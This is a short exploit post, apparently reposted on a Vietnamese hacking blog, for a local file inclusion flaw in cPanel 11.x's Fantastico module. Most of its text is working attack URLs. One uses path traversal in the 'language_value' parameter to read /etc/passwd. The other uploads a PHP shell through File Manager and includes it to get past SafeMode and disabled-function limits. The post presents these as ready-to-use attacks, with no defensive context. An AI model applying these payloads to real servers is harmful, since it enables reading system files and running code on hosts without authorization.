_cPanel 11.x Fantastico LFI Exploit Vulnerability Security Bypass

_________________________________
#[+]Version.: cPanel 11.x
#[+]Author   : ahwak2000
#[+]Home   : 1337day.com
#[+] Date      : 11.08.2011
#[+] E-mail   :  z.u5[at]hotmail.com
#[+]Tested On : win xp sp3
_________________________________

After you log in the cPanel


[-] LFI eXploit:



http://site.com:2082/frontend/x3/fantastico/user_language.php?language_value=../../../../../../etc/passwdahwak2000&Update=Salva
_________________________________



[-] Security Bypass eXploit:



Upload your shell by "File Manager"



Then Go To:



http://site.com:2082/frontend/x3/fantastico/user_language.php?language_value=../../../../../../home/user/public_html/shell.phpahwak2000&Update=Salva


You will find  : SafeMode= OFF , Disable_function : None , ModSecurity =
Off 

Chú Ý:

Coppy phải ghi rõ nguồn Blog - Hacking
 

Copyright © 123 H4ck' Blog. Cung cấp bởi Blogger